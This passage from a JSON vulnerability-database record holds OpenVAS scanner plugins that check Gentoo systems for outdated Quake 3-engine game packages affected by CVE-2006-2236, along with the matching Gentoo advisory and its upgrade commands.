200605-12.", "edition": 2, "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Gentoo Security Advisory GLSA 200605-12 (quake)", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2236"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=56727", "id": "OPENVAS:56727", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Quake 3 engine has a vulnerability that could be exploited to execute\narbitrary code.\";\ntag_solution = \"All Quake 3 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=games-fps/quake3-bin-1.32c'\n\nAll RTCW users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=games-fps/rtcw-1.41b'\n\nAll Enemy Territory users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=games-fps/enemy-territory-2.60b'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200605-12\nhttp://bugs.gentoo.org/show_bug.cgi?id=132377\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200605-12.\";\n\n \n\nif(description)\n{\n script_id(56727);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(17857);\n script_cve_id(\"CVE-2006-2236\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200605-12 (quake)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"games-fps/quake3-bin\", unaffected: make_list(\"ge 1.32c\"), vulnerable: make_list(\"lt 1.32c\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"games-fps/rtcw\", unaffected: make_list(\"ge 1.41b\"), vulnerable: make_list(\"lt 1.41b\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"games-fps/enemy-territory\", unaffected: make_list(\"ge 2.60b\"), vulnerable: make_list(\"lt 2.60b\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:00", "references": [], "pluginID": "63157", "description": "The remote host is missing updates announced in\nadvisory GLSA 200901-06.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-01-13T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Gentoo Security Advisory GLSA 200901-06 (tremulous tremulous-bin)", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2236"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63157", "id": "OPENVAS:63157", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow vulnerability has been discovered in Tremulous.\";\ntag_solution = \"Tremulous users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=games-fps/tremulous-1.1.0-r2'\n\nNote: The binary version of Tremulous has been removed from the Portage\ntree.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200901-06\nhttp://bugs.gentoo.org/show_bug.cgi?id=222119\nhttp://www.gentoo.org/security/en/glsa/glsa-200605-12.xml\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200901-06.\";\n\n \n \n\nif(description)\n{\n script_id(63157);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-13 22:38:32 +0100 (Tue, 13 Jan 2009)\");\n script_cve_id(\"CVE-2006-2236\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200901-06 (tremulous tremulous-bin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"games-fps/tremulous\", unaffected: make_list(\"ge 1.1.0-r2\"), vulnerable: make_list(\"lt 1.1.0-r2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"games-fps/tremulous-bin\", unaffected: make_list(), vulnerable: make_list(\"lt 1.1.0\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:59", "references": [], "pluginID": "136141256231063157", "description": "The remote host is missing updates announced in\nadvisory GLSA 200901-06.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-01-13T00:00:00", "title": "Gentoo Security Advisory GLSA 200901-06 (tremulous tremulous-bin)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2236"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063157", "id": "OPENVAS:136141256231063157", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow vulnerability has been discovered in Tremulous.\";\ntag_solution = \"Tremulous users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=games-fps/tremulous-1.1.0-r2'\n\nNote: The binary version of Tremulous has been removed from the Portage\ntree.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200901-06\nhttp://bugs.gentoo.org/show_bug.cgi?id=222119\nhttp://www.gentoo.org/security/en/glsa/glsa-200605-12.xml\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200901-06.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63157\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-13 22:38:32 +0100 (Tue, 13 Jan 2009)\");\n script_cve_id(\"CVE-2006-2236\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200901-06 (tremulous tremulous-bin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"games-fps/tremulous\", unaffected: make_list(\"ge 1.1.0-r2\"), vulnerable: make_list(\"lt 1.1.0-r2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"games-fps/tremulous-bin\", unaffected: make_list(), vulnerable: make_list(\"lt 1.1.0\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:28", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2236", "https://security.gentoo.org/security/en/glsa/glsa-200605-12.xml", "https://bugs.gentoo.org/show_bug.cgi?id=222119"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.1.0-r2", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "games-fps/tremulous", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.1.0", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "games-fps/tremulous-bin", "operator": "lt"}], "edition": 1, "description": "### Background\n\nTremulous is a team-based First Person Shooter game. \n\n### Description\n\nIt has been reported that Tremulous includes a vulnerable version of the ioQuake3 engine (GLSA 200605-12, CVE-2006-2236). \n\n### Impact\n\nA remote attacker could entice a user to connect to a malicious games server, possibly resulting in the execution of arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nTremulous users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=games-fps/tremulous-1.1.0-r2\"\n\nNote: The binary version of Tremulous has been removed from the Portage tree.", "reporter": "Gentoo Foundation", "published": "2009-01-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Tremulous: User-assisted execution of arbitrary code", "bulletinFamily": "unix", "cvelist": ["CVE-2006-2236"], "modified": "2009-01-11T00:00:00", "id": "GLSA-200901-06", "href": "https://security.gentoo.org/glsa/200901-06", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
